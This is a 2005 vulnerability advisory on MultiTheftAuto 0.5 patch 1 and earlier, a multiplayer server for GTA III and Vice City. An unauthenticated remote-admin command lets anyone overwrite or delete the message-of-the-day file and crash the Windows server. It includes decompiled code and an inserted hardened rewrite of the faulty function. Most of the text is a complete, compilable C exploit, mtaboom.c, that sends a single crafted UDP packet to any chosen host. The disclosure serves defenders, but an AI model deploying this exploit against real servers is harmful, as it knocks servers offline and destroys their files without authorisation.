MultiTheftAuto Privileges Escalation and DoS Vulnerabilities
Source: http://aluigi.altervista.org/  Author: aluigi  Published: 2005-09-27


Summary
MultiTheftAuto (MTA) is a closed-source mod and server for the games Grand Theft Auto III and Grand Theft Auto: Vice City which adds multiplayer capabilities to them.

The MTA server does not check the caller's privileges for one remote-administration command. Any unauthenticated client can use it to overwrite or delete the message of the day, and the same command can crash the server (DoS).

Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/mtaboom-adv.txt

Details
Vulnerable Systems:
* MultiTheftAuto version 0.5 patch 1 and prior

Privileges Escalation:
The MTA server has the remote administration option enabled by default. The problem is an undocumented command (number 40) which allows the modification or the deletion of the content of the motd.txt file used for the message of the day.
This is the only command which doesn't check whether the client is an administrator, so anyone without permissions has access to it.

Denial of Service:
Command 40 is also the cause of another problem located in the same function, which seems incomplete or experimental, as shown by the following "retrieved" code:
    // open file for writing "w"
    length = *(u_int *)(src - (src % 4096));
    for(i = j = 0; i < length; i++) {
        if(src[i] == '\n') dst[j++] = '\r';
        dst[j++] = src[i];
        if(j < 1024) continue;
        if(!WriteFile(...)) break;
        j = 0;
    }
    // close file

The value read into length is -1, so the loop is almost endless: it only stops when src runs past the mapped memory and the read faults. The result is the immediate crash of the MTA server.

It seems that only the Windows server is affected by the crash, because on Linux the function is substituted with the following "still incorrect" instruction, which doesn't produce exceptions:
fd = fopen("motd.txt", "w");
fwrite(data + 4, 1, data, fd); // yes data is the buffer
fclose(fd);
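As an added example (not MTA's code and not part of the advisory), the same "\n" to "\r\n" conversion loop written the way the server should have done it: the length comes from the received datagram rather than from memory near the buffer, the caller's admin status is checked first, and output is still flushed in 1024-byte chunks. The function names, the MAX_MOTD cap and the sink callback that stands in for WriteFile() are assumptions.

```c
#include <string.h>

#define CHUNK    1024
#define MAX_MOTD 4096   /* assumed cap on an acceptable motd payload */

/* Sink callback standing in for WriteFile(): returns 1 on success, 0 on failure. */
typedef int (*sink_fn)(const char *buf, size_t n, void *ctx);

/* Convert '\n' to "\r\n" and hand the result to sink in CHUNK-sized pieces.
 * srclen is the real payload size; nothing is read beyond src[srclen - 1].
 * Returns the number of bytes delivered, or -1 if the request is rejected. */
long motd_write_bounded(int caller_is_admin, const char *src, size_t srclen,
                        sink_fn sink, void *ctx) {
    char dst[CHUNK];
    size_t i, j = 0;
    long total = 0;

    if (!caller_is_admin) return -1;                 /* the check command 40 lacked */
    if (src == NULL || srclen > MAX_MOTD) return -1; /* never trust a wire length */
    for (i = 0; i < srclen; i++) {
        /* worst case one input byte becomes two: flush before dst can overflow */
        if (j + 2 > CHUNK) {
            if (!sink(dst, j, ctx)) return -1;
            total += (long)j;
            j = 0;
        }
        if (src[i] == '\n') dst[j++] = '\r';
        dst[j++] = src[i];
    }
    if (j > 0) {
        if (!sink(dst, j, ctx)) return -1;
        total += (long)j;
    }
    return total;
}

/* In-memory sink used for the demo instead of a real motd.txt. */
struct membuf { char data[2 * MAX_MOTD + 1]; size_t len; };

int mem_sink(const char *buf, size_t n, void *ctx) {
    struct membuf *m = ctx;
    if (m->len + n > sizeof m->data - 1) return 0;
    memcpy(m->data + m->len, buf, n);
    m->len += n;
    m->data[m->len] = '\0';
    return 1;
}

/* Demo with a constructed two-line payload as an admin would send it. */
long demo_motd(struct membuf *out) {
    const char payload[] = "Welcome\nto the server\n";  /* constructed sample */
    out->len = 0; out->data[0] = '\0';
    return motd_write_bounded(1, payload, sizeof payload - 1, mem_sink, out);
}
```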

Exploit:
winerr.h can be found at: http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

mtaboom.c:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep       /* Win32 has no sleep(); Sleep() takes milliseconds */
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

#define VER     "0.1"
#define BUFFSZ  4096
#define PORT    4003
#define TIMEOUT 3
#define PING    "\x0d\x30\x00"  // not a ping, just a way to get a reply
#define BOOM    "\x28"          // that's enough

int timeout(int sock);
u_int resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
    struct sockaddr_in  peer;
    int     sd,
            len;
    u_short port = PORT;
    u_char  buff[BUFFSZ];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "MultiTheftAuto <= 0.5 patch 1 server crash/motd reset "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    fputs("- check server:\n", stdout);
    if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\n"
            "Error: the server doesn't seem to support remote administration\n"
            "       try using the port 24003\n"
            "\n", stdout);
        exit(1);
    }
    len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
    if(len < 0) std_err();

    sleep(ONESEC);

    fputs("- send BOOM packet:\n", stdout);
    if(sendto(sd, BOOM, sizeof(BOOM) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    sleep(ONESEC);

    fputs("- check server:\n", stdout);
    if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem to crash but probably you have deleted its motd.txt file\n\n", stdout);
    }

    close(sd);
    return(0);
}

/* wait up to TIMEOUT seconds for a datagram; -1 means nothing arrived */
int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}

/* accept a dotted-quad address or a hostname; returns the IPv4 address in network order */
u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}

#ifndef WIN32
    /* on Windows std_err() comes from winerr.h */
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

/* EoF */
